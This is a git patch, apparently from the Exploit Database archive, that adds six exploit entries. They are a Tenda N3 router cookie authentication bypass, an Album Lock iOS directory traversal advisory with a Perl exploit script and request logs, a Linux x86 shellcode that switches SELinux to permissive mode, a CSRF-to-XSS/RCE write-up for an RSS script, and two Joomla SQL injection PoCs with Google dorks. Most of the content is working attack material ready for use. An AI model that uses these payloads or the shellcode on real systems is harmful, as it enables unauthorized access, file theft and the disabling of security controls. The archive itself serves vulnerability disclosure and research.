From 4195f70adec6e4422b3144219e45641d1ca2a17f Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 21 Feb 2017 05:01:20 +0000 Subject: [PATCH] DB: 2017-02-21 6 new exploits EFS Easy Chat Server - Authentication Request Buffer Overflow (SEH) EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow (SEH) EFS Easy Chat Server - Cross-Site Request Forgery (Change Admin Password) EFS Easy Chat Server 2.2 - Cross-Site Request Forgery (Change Admin Password) EFS Easy Chat Server - Authentication Request Buffer Overflow (Perl) EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow (Perl) yaws 1.89 - Directory Traversal Yaws 1.89 - Directory Traversal Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes) Jogjacamp JProfile Gold - (id_news) SQL Injection Jogjacamp JProfile Gold - 'id_news' Parameter SQL Injection RSS News AutoPilot Script 1.0.1 / 3.0.3 - Cross-Site Request Forgery Joomla! Component MaQma Helpdesk 4.2.7 - 'id' Parameter SQL Injection Joomla! Component PayPal IPN for DOCman 3.1 - 'id' Parameter SQL Injection Album Lock 4.0 iOS - Directory Traversal Tenda N3 Wireless N150 Home Router - Authentication Bypass --- files.csv | 16 ++- platforms/hardware/webapps/41402.txt | 38 ++++++ platforms/ios/webapps/41401.txt | 186 +++++++++++++++++++++++++++ platforms/lin_x86/shellcode/41403.c | 80 ++++++++++++ platforms/php/webapps/41392.html | 112 ++++++++++++++++ platforms/php/webapps/41399.txt | 17 +++ platforms/php/webapps/41400.txt | 18 +++ 7 files changed, 462 insertions(+), 5 deletions(-) create mode 100755 platforms/hardware/webapps/41402.txt create mode 100755 platforms/ios/webapps/41401.txt create mode 100755 platforms/lin_x86/shellcode/41403.c create mode 100755 platforms/php/webapps/41392.html create mode 100755 platforms/php/webapps/41399.txt create mode 100755 platforms/php/webapps/41400.txt diff --git a/files.csv b/files.csv index 053b676f2..025b36f6a 100644 --- a/files.csv +++ b/files.csv @@ -9946,12 +9946,12 @@ id,file,description,date,author,platform,type,port 8097,platforms/multiple/remote/8097.txt,"MLdonkey 2.9.7 - Arbitrary File Disclosure",2009-02-23,"Michael Peselnik",multiple,remote,0 8117,platforms/windows/remote/8117.pl,"POP Peeper 3.4.0.0 - UIDL Remote Buffer Overflow (SEH)",2009-02-27,"Jeremy Brown",windows,remote,0 8118,platforms/windows/remote/8118.html,"Orbit Downloader 2.8.4 - Long Hostname Remote Buffer Overflow",2009-02-27,JavaGuru,windows,remote,0 -8142,platforms/windows/remote/8142.py,"EFS Easy Chat Server - Authentication Request Buffer Overflow (SEH)",2009-03-03,His0k4,windows,remote,80 +8142,platforms/windows/remote/8142.py,"EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow (SEH)",2009-03-03,His0k4,windows,remote,80 8143,platforms/windows/remote/8143.html,"Sopcast SopCore Control - 'sopocx.ocx' Command Execution",2009-03-03,Nine:Situations:Group,windows,remote,0 8144,platforms/windows/remote/8144.txt,"Imera ImeraIEPlugin - ActiveX Control Remote Code Execution",2009-03-03,Elazar,windows,remote,0 -8149,platforms/windows/remote/8149.txt,"EFS Easy Chat Server - Cross-Site Request Forgery (Change Admin Password)",2009-03-03,Stack,windows,remote,0 +8149,platforms/windows/remote/8149.txt,"EFS Easy Chat Server 2.2 - Cross-Site Request Forgery (Change Admin Password)",2009-03-03,Stack,windows,remote,0 8152,platforms/windows/remote/8152.py,"Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)",2009-03-04,"Ahmed Obied",windows,remote,0 -8154,platforms/windows/remote/8154.pl,"EFS Easy Chat Server - Authentication Request Buffer Overflow (Perl)",2009-03-04,Dr4sH,windows,remote,80 +8154,platforms/windows/remote/8154.pl,"EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow (Perl)",2009-03-04,Dr4sH,windows,remote,80 8155,platforms/windows/remote/8155.txt,"Easy File Sharing Web Server 4.8 - File Disclosure",2009-03-04,Stack,windows,remote,0 8160,platforms/windows/remote/8160.html,"SupportSoft DNA Editor Module - 'dnaedit.dll' Code Execution",2009-03-05,Nine:Situations:Group,windows,remote,0 8173,platforms/windows/remote/8173.txt,"Belkin BullDog Plus - UPS-Service Buffer Overflow",2009-03-09,Elazar,windows,remote,0 @@ -10443,7 +10443,7 @@ id,file,description,date,author,platform,type,port 15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 RETR DELE RMD - Directory Traversal",2010-10-30,"Yakir Wizman",windows,remote,0 15358,platforms/windows/remote/15358.txt,"SmallFTPd 1.0.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0 15368,platforms/windows/remote/15368.php,"Buffy 1.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0 -15371,platforms/windows/remote/15371.txt,"yaws 1.89 - Directory Traversal",2010-11-01,nitr0us,windows,remote,0 +15371,platforms/windows/remote/15371.txt,"Yaws 1.89 - Directory Traversal",2010-11-01,nitr0us,windows,remote,0 15373,platforms/windows/remote/15373.txt,"mongoose Web server 2.11 - Directory Traversal",2010-11-01,nitr0us,windows,remote,0 15421,platforms/windows/remote/15421.html,"Microsoft Internet Explorer 6/7/8 - Memory Corruption",2010-11-04,ryujin,windows,remote,0 15423,platforms/android/remote/15423.html,"Google Android 2.0 < 2.1 - Reverse Shell Exploit",2010-11-05,"MJ Keith",android,remote,0 @@ -15899,6 +15899,7 @@ id,file,description,date,author,platform,type,port 41375,platforms/linux/shellcode/41375.c,"Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0 41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0 41398,platforms/linux/shellcode/41398.nasm,"Linux - Reverse Shell Shellcode (66 bytes)",2017-02-19,"Robert L. Taylor",linux,shellcode,0 +41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,"Krzysztof Przybylski",lin_x86,shellcode,0 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 @@ -20815,7 +20816,7 @@ id,file,description,date,author,platform,type,port 8141,platforms/php/webapps/8141.txt,"blindblog 1.3.1 - SQL Injection / Authentication Bypass / Local File Inclusion",2009-03-03,"Salvatore Fresta",php,webapps,0 8145,platforms/php/webapps/8145.txt,"tghostscripter Amazon Shop - Cross-Site Scripting / Directory Traversal / Remote File Inclusion",2009-03-03,d3b4g,php,webapps,0 8150,platforms/php/webapps/8150.txt,"Novaboard 1.0.1 - Cross-Site Scripting",2009-03-03,Pepelux,php,webapps,0 -8151,platforms/php/webapps/8151.txt,"Jogjacamp JProfile Gold - (id_news) SQL Injection",2009-03-03,kecemplungkalen,php,webapps,0 +8151,platforms/php/webapps/8151.txt,"Jogjacamp JProfile Gold - 'id_news' Parameter SQL Injection",2009-03-03,kecemplungkalen,php,webapps,0 8161,platforms/php/webapps/8161.txt,"celerbb 0.0.2 - Multiple Vulnerabilities",2009-03-05,"Salvatore Fresta",php,webapps,0 8164,platforms/php/webapps/8164.php,"Joomla! Component com_iJoomla_archive - Blind SQL Injection",2009-03-05,Stack,php,webapps,0 8165,platforms/php/webapps/8165.txt,"Blue Eye CMS 1.0.0 - Remote Cookie SQL Injection",2009-03-06,ka0x,php,webapps,0 @@ -37310,7 +37311,12 @@ id,file,description,date,author,platform,type,port 41389,platforms/php/webapps/41389.txt,"Joomla! Component Room Management 1.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 41390,platforms/php/webapps/41390.txt,"Joomla! Component Bazaar Platform 3.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 41391,platforms/php/webapps/41391.txt,"Joomla! Component Google Map Store Locator 4.4 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 +41392,platforms/php/webapps/41392.html,"RSS News AutoPilot Script 1.0.1 / 3.0.3 - Cross-Site Request Forgery",2016-08-30,"Arbin Godar",php,webapps,0 41393,platforms/php/webapps/41393.txt,"Joomla! Component Most Wanted Real Estate 1.1.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 41394,platforms/hardware/webapps/41394.py,"NETGEAR DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution",2017-02-18,SivertPL,hardware,webapps,0 41395,platforms/windows/webapps/41395.txt,"Sawmill Enterprise 8.7.9 - Authentication Bypass",2017-02-18,hyp3rlinx,windows,webapps,0 41396,platforms/php/webapps/41396.txt,"PHPShell 2.4 - Session Fixation",2017-02-19,hyp3rlinx,php,webapps,0 +41399,platforms/php/webapps/41399.txt,"Joomla! Component MaQma Helpdesk 4.2.7 - 'id' Parameter SQL Injection",2017-02-20,"Ihsan Sencan",php,webapps,0 +41400,platforms/php/webapps/41400.txt,"Joomla! Component PayPal IPN for DOCman 3.1 - 'id' Parameter SQL Injection",2017-02-20,"Ihsan Sencan",php,webapps,0 +41401,platforms/ios/webapps/41401.txt,"Album Lock 4.0 iOS - Directory Traversal",2017-02-20,Vulnerability-Lab,ios,webapps,0 +41402,platforms/hardware/webapps/41402.txt,"Tenda N3 Wireless N150 Home Router - Authentication Bypass",2015-09-03,"Mandeep Jadon",hardware,webapps,0 diff --git a/platforms/hardware/webapps/41402.txt b/platforms/hardware/webapps/41402.txt new file mode 100755 index 000000000..f647a56f3 --- /dev/null +++ b/platforms/hardware/webapps/41402.txt @@ -0,0 +1,38 @@ +# Exploit Title: Complete Authentication Bypass In Tenda N3 Wireless N150 Routers +# Date: 03-09-2015 +# Software Link: http://tendacn.com/en/product/N150.html +# Exploit Author: Mandeep Jadon +# Contact: http://twitter.com/1337tr0lls +# Website: http://twitter.com/1337tr0lls +# CVE: CVE-2015-5995 +# Category: Device + + +Description: + +The router (AP) is using very poor authentication mechanism . It uses a +static cookie to verify the incoming authentication. After careful +inspection it was found that the cookie used were same for any number of +authentication by the Admin . + +Thus the cookie can be easily forged and the admin account could be +compromised without supplying the credentials . + +Proof Of Concept: + +Inject the following cookie in the browser with the given values : + +admin:language : en + +Reload the page . You are logged into the admin account . + +Video POC : https://www.youtube.com/watch?v=dvF-7KK0g6E + +Mitigation : + +Use: a secure authentication mechanism consisting of random , complex +cookies . + +References : +https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5995 +https://www.kb.cert.org/vuls/id/630872 diff --git a/platforms/ios/webapps/41401.txt b/platforms/ios/webapps/41401.txt new file mode 100755 index 000000000..da6eeda24 --- /dev/null +++ b/platforms/ios/webapps/41401.txt @@ -0,0 +1,186 @@ +Document Title: +=============== +Album Lock v4.0 iOS - Directory Traversal Vulnerability + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2033 + + +Release Date: +============= +2017-02-20 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2033 + + +Common Vulnerability Scoring System: +==================================== +7.2 + + +Product & Service Introduction: +=============================== +Do you have any secret photo and videos in your iPhone? Album Lock can protect your privacy perfectly. Album is the most +convenient private Photo&Video App! You can add your SPECIAL photos&videos into AlbumLock, we provides many convenient ways. +From Photo App(Camera Roll), iTunes File Sharing Sync, WiFi Transfer and in App Camera. + +(Copy of the Homepage: https://itunes.apple.com/us/app/album-lock-lock-secret-photo/id851608952 ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered a directory traversal web vulnerability in the official Album Lock v4.0 ios mobile application. + + +Vulnerability Disclosure Timeline: +================================== +2017-02-20: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +A directory traversal web vulnerability has been dsicovered in the official Album Lock v4.0 iOS mobile web-application. +The issue allows an attackers to unauthorized request and download local application files by manipulation of path parameters. + +The directory traversal web vulnerability is located in the `filePaht` parameter of the wifi web-server interface. Remote attackers +are able to request the local web-server during the sharing process to access unauthenticated application files. Attackers are able +to request via `getObject` image path variables to access or download files. Remote attackers are able to access the root `document` +path of the application. The request method to execute is GET and the attack vector is located on the client-side of the web-server +web-application. Finally an attacker is able to access with the credentials the service by using a client via http protocol. + +The security risk of the directory traversal vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.2. +Exploitation of the web vulnerability requires no privilege web-application user account or user interaction. Successful exploitation of the +vulnerability results in information leaking, mobile application compromise by unauthorized and unauthenticated access. + +Request Method(s): +[+] GET + +Vulnerable Module(s): +[+] getObject + +Vulnerable Parameter(s): +[+] filePaht + +Affected Module(s): +[+] Web-Server File System + + +Proof of Concept (PoC): +======================= +The security vulnerability can be exploited by remote attackers without user interaction or privilege web-application user account. +For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + + +Standard Request: +http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/Documents/._alias_images/fhhjjj/picture-00001.png + + +PoC: Payload +/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C./../../../Application + + +Malicious Request: Exploitation +http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/Documents/ +http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/ +http://localhost:8880/getImage?filePaht=/var/mobile/ + + +PoC: Exploit +use strict; +use LWP::UserAgent; +my $b = LWP::UserAgent->new(); +my $host = "1.1.1.1:5555"; +print $b->get("http://".$host."/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/config.dat")->content; + + +--- PoC Session Logs [GET] --- +Status: 200[OK] +GET http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C./../../../Application +Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:8880] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0] + Accept[*/*] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Referer[http://localhost:8880/list_gif.html?folder=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/] + Connection[keep-alive] + Response Header: + Accept-Ranges[bytes] + + +Reference(s): +http://localhost:8880/ +http://localhost:8880/getImage +http://localhost:8880/getImage?filePaht= +http://localhost:8880/list_gif.html +http://localhost:8880/list_gif.html?folder= + + +Solution - Fix & Patch: +======================= +The vulnerability can be patch by disallowing the filepaht parameter to request upper local paths outside the document folder. +Include a whitelist of allowed requested path and setup a secure exception to prevent on exploitation. + + +Security Risk: +============== +The security risk of the directory traversal web vulnerability in the mobile application is estimated as high. (CVSS 7.2) + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.) + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed +or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable +in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab +or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for +consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact +Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php + +Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by +Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark +of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission. + + Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™ + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM +SERVICE: www.vulnerability-lab.com + + diff --git a/platforms/lin_x86/shellcode/41403.c b/platforms/lin_x86/shellcode/41403.c new file mode 100755 index 000000000..032587d2a --- /dev/null +++ b/platforms/lin_x86/shellcode/41403.c @@ -0,0 +1,80 @@ +# Title: x86 SELinux change between permissive and enforcing modes shellcode +# Date: 20-02-2017 +# Author: Krzysztof Przybylski +# Platform: Lin_x86 +# Tested on: CentOS 6.8 (i686) +# Shellcode Size: 45 bytes +# ID: SLAE - 871 +/* + +1. Description: + +SELinux mode switcher. Permissive = "\x30"; Enforcing = "\x31" +gcc -fno-stack-protector -z execstack SELinux-mode.c -o SELinux-mode + +2. Disassembly of section .text: + +08048060 <_start>: + 8048060: 6a 0b push 0xb + 8048062: 58 pop eax + 8048063: 31 d2 xor edx,edx + 8048065: 52 push edx + 8048066: 6a 30 push 0x30 + 8048068: 89 e1 mov ecx,esp + 804806a: 52 push edx + 804806b: 68 6f 72 63 65 push 0x6563726f + 8048070: 68 74 65 6e 66 push 0x666e6574 + 8048075: 68 6e 2f 73 65 push 0x65732f6e + 804807a: 68 2f 73 62 69 push 0x6962732f + 804807f: 68 2f 75 73 72 push 0x7273752f + 8048084: 89 e3 mov ebx,esp + 8048086: 52 push edx + 8048087: 51 push ecx + 8048088: 53 push ebx + 8048089: 89 e1 mov ecx,esp + 804808b: cd 80 int 0x80 + +3. Code + +global _start +section .text +_start: + push 0xb + pop eax + xor edx, edx + push edx + push byte 0x30 + mov ecx, esp + push edx + push 0x6563726f + push 0x666e6574 + push 0x65732f6e + push 0x6962732f + push 0x7273752f + mov ebx, esp + push edx + push ecx + push ebx + mov ecx, esp + int 0x80 +*/ + +#include +#include + +unsigned char code[] = \ +"\x6a\x0b\x58\x31\xd2\x52\x6a" +"\x30" +"\x89\xe1\x52\x68\x6f\x72\x63\x65" +"\x68\x74\x65\x6e\x66\x68\x6e\x2f" +"\x73\x65\x68\x2f\x73\x62\x69\x68" +"\x2f\x75\x73\x72\x89\xe3\x52\x51" +"\x53\x89\xe1\xcd\x80"; + +main() +{ + printf("Shellcode Length: %d\n", strlen(code)); + int (*ret)() = (int(*)())code; + ret(); +} + diff --git a/platforms/php/webapps/41392.html b/platforms/php/webapps/41392.html new file mode 100755 index 000000000..5e2712d26 --- /dev/null +++ b/platforms/php/webapps/41392.html @@ -0,0 +1,112 @@ +# Exploit Title: RSS News AutoPilot Script 1.0.1 / 3.0.3 - CSRF to +Persistent XSS and RCE Through Unrestricted File Upload +# Date: 30 August 2016 +# Exploit Author: Arbin Godar +# Website : ArbinGodar.com +# Software Link: https://codecanyon.net/item/rss-news-autopilot-script/11812898 +# Version: 1.0.1 to 3.0.3 + +---------------------------------------------------------------------------------------------------------------------- + +RSS News AutoPilot Script File: +http://www.mediafire.com/file/6dmegm8ak1jv2u1/rss.zip + +Description: +An Attackers are able to execute js and php code on web +application using RSS News - AutoPilot Script which allow an attacker to +create a post when an authenticated user/admin browses a special +crafted web page. Also, all the process was possible without any +authenticated user/admin for more info watch the below PoC Video. + +The title parameter was not filtering special characters mean +vulnerable to XSS and while uploading image they weren't filtering the file +type mean vulnerable to unrestricted file upload. So, now by creating CSRF +exploit code for posting +an article with XSS alert JS payload as title of post and php file as a +image. Now if the +attacker is able to perform CSRF attack sucessfully then XSS will be +triggered and we can execute php code too. + +PoC Video: https://youtu.be/znDgv8K0yFk + +CSRF Exploit Code: + + + + [RSS News - AutoPilot Script] CSRF to Persistent XSS and +RCE + +


+
+

[RSS News - AutoPilot Script] CSRF to Persistent +XSS and RCE

+
+ +
+
+ + + +Vendor Shouted Urgent Update: +http://wpsup.com/products/rss-news-script/urgent-update-fix-security-bugs/ + +Fix/Patch: Update to latest version. + +---------------------------------------------------------------------------------------------------------------------- + +Regards, +Arbin Godar +https://twitter.com/arbingodar diff --git a/platforms/php/webapps/41399.txt b/platforms/php/webapps/41399.txt new file mode 100755 index 000000000..b9c278471 --- /dev/null +++ b/platforms/php/webapps/41399.txt @@ -0,0 +1,17 @@ +# # # # # +# Exploit Title: Joomla! Component MaQma Helpdesk v4.2.7 - SQL Injection +# Google Dork: inurl:index.php?option=com_maqmahelpdesk +# Date: 20.02.2017 +# Vendor Homepage: http://componentslab.com/ +# Software Buy: https://extensions.joomla.org/extensions/extension/clients-a-communities/help-desk/maqma-helpdesk/ +# Demo: http://demo.componentslab.com/index.php/department/software-support +# Version: 4.2.7 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_maqmahelpdesk&task=pdf_kb&id=[SQL] +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41400.txt b/platforms/php/webapps/41400.txt new file mode 100755 index 000000000..6306df46e --- /dev/null +++ b/platforms/php/webapps/41400.txt @@ -0,0 +1,18 @@ +# # # # # +# Exploit Title: Joomla! Component PayPal IPN for DOCman v3.1 - SQL Injection +# Google Dork: inurl:index.php?option=com_docmanpaypal +# Date: 20.02.2017 +# Vendor Homepage: http://shopfiles.com/ +# Software Buy: https://extensions.joomla.org/extensions/extension/extension-specific/docman-extensions/paypal-ipn-for-docman/ +# Demo: http://demo.shopfiles.com/index.php/paypal-ipn-for-docman +# Version: 3.1 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_docmanpaypal&task=addToCart&id=[SQL] +# # # # # +